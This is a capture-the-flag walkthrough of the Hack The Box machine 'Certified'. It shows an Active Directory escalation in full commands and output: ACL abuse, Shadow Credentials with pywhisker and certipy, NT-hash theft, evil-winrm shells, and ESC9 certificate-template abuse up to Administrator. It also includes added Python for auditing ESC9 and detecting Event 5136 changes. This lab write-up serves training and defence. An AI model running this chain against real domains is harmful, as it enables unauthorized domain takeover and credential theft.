Certified provides credentials for a first user. With these we abuse WriteOwner and GenericWrite to gain access to a second user. That user has GenericAll over another user, through which we reach a third user. With that last user we identify ESC9 and, after exploiting it, gain access as administrator.
| Field | Value |
|---|---|
| Name | Certified |
| OS | Windows |
| Points | 30 |
| Difficulty | Medium |
| Release Date | 2024-11-02 |
| IP | 10.10.11.41 |
| Maker | ruycr4ft |
Rated (user-rated difficulty votes): Cake 132, VeryEasy 101, Easy 571, TooEasy 822, Medium 1060, BitHard 598, Hard 347, TooHard 67, ExHard 24, BrainFuck 26.
As is common in real life Windows pentests, you will start this box with credentials for the following account: judith.mader / judith09
Recon
nmap
nmap shows multiple open ports, the usual Domain Controller set: DNS (53), Kerberos (88), RPC (135), SMB (445), LDAP (389/636) and the global catalog (3268/3269), among others.
```text
# Nmap 7.95 scan initiated Sun Feb 2 00:30:12 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,3268,3269,9389,49666,49668,49673,49674,49681,49716,49741,49774 -sV -sC -oN nmap_scan 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-02 12:30:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-02-02T12:31:53+00:00; +7h00m03s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
49774/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=2/2%Time=679F02F9%P=x86_64-pc-linux-gnu%r(DNS-S
SF:D-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_
SF:udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m03s, deviation: 0s, median: 7h00m03s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-02T12:31:12
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 2 00:31:50 2025 -- 1 IP address (1 host up) scanned in 97.89 seconds
```
SMB & LDAP
crackmapexec shows that the credentials have SMB access.
```bash
❯ crackmapexec smb 10.10.11.41 -u "judith.mader" -p "judith09" --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [+] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share
❯
```
The same holds for the LDAP service.
```bash
❯ ldapsearch -H ldap://certified.htb -D 'judith.mader@certified.htb' -w judith09 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=certified,DC=htb
namingcontexts: CN=Configuration,DC=certified,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=certified,DC=htb
namingcontexts: DC=DomainDnsZones,DC=certified,DC=htb
namingcontexts: DC=ForestDnsZones,DC=certified,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
❯
```
Bloodhound
We run bloodhound-python with judith's credentials, asking for zip output so it can be imported into bloodhound.
```bash
❯ bloodhound-python -u judith.mader -p "judith09" -ns 10.10.11.41 -d certified.htb -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.certified.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250204061108_bloodhound.zip
❯
```
Path to Admin
'Shortest path to here from Owned' in bloodhound suggests a route to Administrator, starting by gaining access as management_svc.

Judith has "WriteOwner" over the Management group, and the group has "GenericWrite" over management_svc; with these two permissions we can reach that user.

User - management_svc
Ownership & Full Control on Management
We run owneredit and dacledit to gain control over the Management group.
```bash
# Granting Ownership
❯ impacket-owneredit -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
❯
# Granting Full Control
❯ impacket-dacledit -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250204-064047.bak
[*] DACL modified successfully!
❯
```
Now that we control the group we can add Judith to it, then list the group's members to verify.
```bash
# Add judith to Management group
# net rpc group addmem "Management" "judith.mader" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
# Check members of Management group
# net rpc group MEMBERS "Management" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
❯ net rpc group addmem "Management" "judith.mader" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
❯ net rpc group MEMBERS "Management" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
CERTIFIED\judith.mader
CERTIFIED\management_svc
❯
```
Shadow Credentials
Bloodhound recommends Targeted Kerberoast and Shadow Credentials. We use pywhisker, after fixing an error in the OpenSSL.crypto module by installing openssl 24 and cryptography 41.
Running pywhisker with the list action shows the msDS-KeyCredentialLink attribute as empty; running it again with the add action succeeds and also produces a certificate that can be used to obtain a TGT with PKINITtools.
```bash
# action: list
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
❯
# action: add
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: bdb48b22-e092-48a0-876b-936d641db4b6
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Mu21Nexs.pfx
[*] Must be used with password: PHbokfyjxLWtcP4yNyQe
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
❯
```
We request the ticket with gettgtpkinit, passing the certificate and the password generated above.
```bash
# TGT request
❯ python ../tools/PKINITtools/gettgtpkinit.py -cert-pfx Mu21Nexs.pfx -pfx-pass PHbokfyjxLWtcP4yNyQe certified.htb/management_svc Mu21Nexs.ccache
2025-02-04 07:11:59,908 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-04 07:11:59,918 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-04 07:12:15,347 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-04 07:12:15,348 minikerberos INFO a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
INFO:minikerberos:a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
2025-02-04 07:12:15,349 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
❯
```
getnthash lets us recover management_svc's NT hash, given the ticket and the AS-REP key.
```bash
# Recover the NT Hash
❯ export KRB5CCNAME=Mu21Nexs.ccache; python3 ../tools/PKINITtools/getnthash.py -key a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52 certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
❯
```
TGT & NT Hash - Certipy
The ticket and the hash can also be obtained with certipy.
```bash
# TGT & NT Hash
❯ certipy-ad cert -export -pfx Mu21Nexs.pfx -password "PHbokfyjxLWtcP4yNyQe" -out unprotected_pfx.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'unprotected_pfx.pfx'
❯ certipy-ad auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "CERTIFIED.HTB"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584
❯
```
Shadow Credentials - Certipy
Likewise, Shadow Credentials can be done entirely with Certipy, which returns management_svc's TGT and NT hash directly.
```bash
# auto shadow credentials - certipy
❯ certipy-ad shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '97ceda79-c6f7-d035-510c-84dbe64975a2'
[*] Adding Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
❯
```
Shell
We use the hash against the WinRM service, gaining access to the machine and the user.txt flag.
```bash
❯ evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Documents> dir ../Desktop
Directory: C:\Users\management_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/1/2025 8:17 AM 34 user.txt
*Evil-WinRM* PS C:\Users\management_svc\Documents> cat ../Desktop/user.txt
4ce4958305057e0df7e34a30d7c9b4e0
*Evil-WinRM* PS C:\Users\management_svc\Documents>
```
User - ca_operator
Bloodhound shows and suggests DCSync over Active Directory, but management_svc does not belong to the Domain Admins group.

The only reachable user is ca_operator: management_svc has GenericAll over it.

Shadow Credentials
Bloodhound suggests shadow credentials; we run the attack with certipy and obtain this user's hash.
```bash
❯ certipy-ad shadow auto -u management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7895b679-029c-6a52-eb80-d38aaa80b34b'
[*] Adding Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2
❯
```
ESC9
With ca_operator's hash we run certipy to look for vulnerable templates. The CertifiedAuthentication template is vulnerable to ESC9.
```bash
❯ certipy-ad find -vulnerable -u ca_operator@certified.htb -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                         : certified-DC01-CA
    DNS Name                        : DC01.certified.htb
    Certificate Subject             : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number       : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start      : 2024-05-13 15:33:41+00:00
    Certificate Validity End        : 2124-05-13 15:43:41+00:00
    Web Enrollment                  : Disabled
    User Specified SAN              : Disabled
    Request Disposition             : Issue
    Enforce Encryption for Requests : Enabled
    Permissions
      Owner                         : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCertificates          : CERTIFIED.HTB\Administrators
                                      CERTIFIED.HTB\Domain Admins
                                      CERTIFIED.HTB\Enterprise Admins
        ManageCa                    : CERTIFIED.HTB\Administrators
                                      CERTIFIED.HTB\Domain Admins
                                      CERTIFIED.HTB\Enterprise Admins
        Enroll                      : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                   : CertifiedAuthentication
    Display Name                    : Certified Authentication
    Certificate Authorities         : certified-DC01-CA
    Enabled                         : True
    Client Authentication           : True
    Enrollment Agent                : False
    Any Purpose                     : False
    Enrollee Supplies Subject       : False
    Certificate Name Flag           : SubjectRequireDirectoryPath
                                      SubjectAltRequireUpn
    Enrollment Flag                 : NoSecurityExtension
                                      AutoEnrollment
                                      PublishToDs
    Private Key Flag                : 16842752
    Extended Key Usage              : Server Authentication
                                      Client Authentication
    Requires Manager Approval       : False
    Requires Key Archival           : False
    Authorized Signatures Required  : 0
    Validity Period                 : 1000 years
    Renewal Period                  : 6 weeks
    Minimum RSA Key Length          : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights           : CERTIFIED.HTB\operator ca
                                      CERTIFIED.HTB\Domain Admins
                                      CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                       : CERTIFIED.HTB\Administrator
        Write Owner Principals      : CERTIFIED.HTB\Domain Admins
                                      CERTIFIED.HTB\Enterprise Admins
                                      CERTIFIED.HTB\Administrator
        Write Dacl Principals       : CERTIFIED.HTB\Domain Admins
                                      CERTIFIED.HTB\Enterprise Admins
                                      CERTIFIED.HTB\Administrator
        Write Property Principals   : CERTIFIED.HTB\Domain Admins
                                      CERTIFIED.HTB\Enterprise Admins
                                      CERTIFIED.HTB\Administrator
    [!] Vulnerabilities
      ESC9                          : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
❯
```
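As an added defender-side check (not part of the original writeup, and not Certipy's code), the Python below scores a template against the ESC9 preconditions visible in the enumeration above: client authentication, the NoSecurityExtension enrollment flag, enrollment rights held by a low-privileged principal, no approval gate, and a KDC that is not in full StrongCertificateBindingEnforcement mode. The TEMPLATE dict is hand-transcribed from the output above; the PRIVILEGED group set and the KDC registry value passed in are assumptions.

```python
"""ESC9 audit of an AD CS template (added example; not Certipy's own code).
TEMPLATE is transcribed by hand from the `certipy find` output for
CertifiedAuthentication; the names in PRIVILEGED are an assumption."""

# Enrollment rights held by these principals are not a finding: they are already privileged.
PRIVILEGED = {"domain admins", "enterprise admins", "administrators", "administrator"}

TEMPLATE = {  # constructed from the enumeration above
    "name": "CertifiedAuthentication",
    "enabled": True,
    "client_authentication": True,
    # msPKI-Enrollment-Flag values as Certipy prints them. NoSecurityExtension
    # means issued certificates carry no SID security extension (szOID_NTDS_CA_SECURITY_EXT).
    "enrollment_flags": ["NoSecurityExtension", "AutoEnrollment", "PublishToDs"],
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": [
        "CERTIFIED.HTB\\operator ca",
        "CERTIFIED.HTB\\Domain Admins",
        "CERTIFIED.HTB\\Enterprise Admins",
    ],
}


def low_privileged_enrollers(template):
    """Enrollment principals outside PRIVILEGED: the accounts whose UPN an attacker would rewrite."""
    return [p for p in template["enrollment_rights"]
            if p.split("\\")[-1].lower() not in PRIVILEGED]


def esc9_issues(template, kdc_strong_binding=1):
    """Return the conditions that together make `template` usable for ESC9 (empty = not usable).

    kdc_strong_binding mirrors the DC registry value
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement
    (0 = disabled, 1 = compatibility, 2 = full enforcement). In mode 2 the KDC rejects
    authentication certificates that lack the SID extension and have no explicit strong mapping,
    so the missing-extension template alone no longer yields a usable certificate."""
    enrollers = low_privileged_enrollers(template)
    gated = template["requires_manager_approval"] or template["authorized_signatures_required"] > 0
    preconditions = [
        template["enabled"] and template["client_authentication"],
        "NoSecurityExtension" in template["enrollment_flags"],
        bool(enrollers),
        not gated,
        kdc_strong_binding != 2,
    ]
    if not all(preconditions):
        return []
    return [
        f"{template['name']}: client-auth certificates are issued without the SID security extension",
        "enrollable by low-privileged principals: " + ", ".join(enrollers),
        f"KDC StrongCertificateBindingEnforcement={kdc_strong_binding} (not full enforcement)",
    ]


def harden(template):
    """Template-side fix: clear NoSecurityExtension so new certificates embed the requester's SID."""
    fixed = dict(template)
    fixed["enrollment_flags"] = [f for f in template["enrollment_flags"] if f != "NoSecurityExtension"]
    return fixed


if __name__ == "__main__":
    for line in esc9_issues(TEMPLATE, kdc_strong_binding=1):
        print("[!]", line)
    print("after hardening:", esc9_issues(harden(TEMPLATE)) or "no ESC9 issues")
```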
Privesc
Exploiting ESC9 requires GenericWrite over another account. That is the case here: we have GenericAll over ca_operator, and ca_operator has enrollment rights on the vulnerable template.
Holding ca_operator's hash, we start by changing ca_operator's userPrincipalName to Administrator.
```bash
❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
❯
```
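On the detection side (an added example, not part of the writeup): the Shadow Credentials steps earlier (pywhisker and `certipy shadow auto` against management_svc and ca_operator) and the UPN rewrite just above all produce Directory Service Changes events (Event ID 5136) on the DC when object-modification auditing is enabled. The function below applies two rules to 5136-style records: a msDS-KeyCredentialLink value added by a principal other than the account itself, and a userPrincipalName rewritten to the name of a different existing account. The events, the DNs and the DN-to-account map are constructed; the field names follow the 5136 event schema.

```python
"""Hunt for Shadow Credentials and UPN tampering in Event ID 5136 records.
Added example (not from the writeup). EVENTS and ACCOUNT_BY_DN are constructed
to mirror the steps in this writeup; field names follow the 5136 event schema,
the distinguished names and attribute values are made up."""

# OperationType codes used by 5136: value added / value deleted
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"

# Constructed directory snapshot: object DN -> sAMAccountName
ACCOUNT_BY_DN = {
    "CN=management service,CN=Users,DC=certified,DC=htb": "management_svc",
    "CN=operator ca,CN=Users,DC=certified,DC=htb": "ca_operator",
    "CN=Administrator,CN=Users,DC=certified,DC=htb": "Administrator",
    "CN=DC01,OU=Domain Controllers,DC=certified,DC=htb": "DC01$",
}

# Constructed 5136 records (the KeyCredential AttributeValue blob is truncated)
EVENTS = [
    {"SubjectUserName": "judith.mader", "ObjectDN": "CN=management service,CN=Users,DC=certified,DC=htb",
     "LDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED, "AttributeValue": "B:828:..."},
    {"SubjectUserName": "management_svc", "ObjectDN": "CN=operator ca,CN=Users,DC=certified,DC=htb",
     "LDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED, "AttributeValue": "B:828:..."},
    {"SubjectUserName": "management_svc", "ObjectDN": "CN=operator ca,CN=Users,DC=certified,DC=htb",
     "LDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_DELETED, "AttributeValue": "B:828:..."},
    {"SubjectUserName": "management_svc", "ObjectDN": "CN=operator ca,CN=Users,DC=certified,DC=htb",
     "LDAPDisplayName": "userPrincipalName", "OperationType": VALUE_ADDED, "AttributeValue": "Administrator"},
    # Benign control case: a machine registering a key credential on its own object
    {"SubjectUserName": "DC01$", "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=certified,DC=htb",
     "LDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED, "AttributeValue": "B:828:..."},
]


def analyze_5136(events, account_by_dn):
    """Return (rule, subject, target_account, detail) tuples for suspicious attribute writes."""
    known = {name.lower() for name in account_by_dn.values()}
    findings = []
    for ev in events:
        target = account_by_dn.get(ev["ObjectDN"], "<unknown>")
        subject = ev["SubjectUserName"]
        if ev["OperationType"] != VALUE_ADDED:
            continue  # a deletion alone is not a finding; Certipy's 'auto' mode restores the old value
        if ev["LDAPDisplayName"] == "msDS-KeyCredentialLink" and subject.lower() != target.lower():
            # Someone other than the account wrote a KeyCredential: they can now PKINIT as the target.
            findings.append(("shadow_credentials", subject, target,
                             "msDS-KeyCredentialLink written by another principal"))
        elif ev["LDAPDisplayName"] == "userPrincipalName":
            new_upn = ev["AttributeValue"].split("@", 1)[0].lower()
            # The UPN now names a *different* existing account: the setup step for ESC9/ESC10.
            if new_upn != target.lower() and new_upn in known:
                findings.append(("upn_collision", subject, target, f"UPN now maps to {new_upn}"))
    return findings


if __name__ == "__main__":
    for rule, subject, target, detail in analyze_5136(EVENTS, ACCOUNT_BY_DN):
        print(f"[{rule}] {subject} -> {target}: {detail}")
```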
As ca_operator we request a certificate from the vulnerable CertifiedAuthentication template.
```bash
❯ certipy-ad req -u ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca "certified-DC01-CA" -template CertifiedAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
❯
```
We restore the original userPrincipalName value on the ca_operator user.
```bash
❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operater@certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operater@certified.htb
[*] Successfully updated 'ca_operator'
❯
```
Now, with the certificate requested earlier, we try to obtain administrator's hash.
```bash
❯ certipy-ad auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
❯
```
Shell
With the hash we gain access as administrator and read the root.txt flag.
```bash
❯ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -s .
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/2/2025 7:31 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
2e166de877e3683a84c6120a9909e6b0
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
```
Ref.